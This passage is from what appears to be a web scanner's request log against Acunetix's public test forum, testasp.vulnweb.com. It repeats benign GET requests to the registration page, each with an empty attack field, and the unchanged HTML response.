| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 364 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=2 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:31 GMT Content-Length: 3549 |
| Response Body - size: 3,549 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:49 GMT Content-Length: 3550 |
| Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=1 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:48 GMT Content-Length: 3550 |
| Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=10 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:51 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=11 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:52 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=12 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:52 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=13 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:52 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=14 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:53 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- 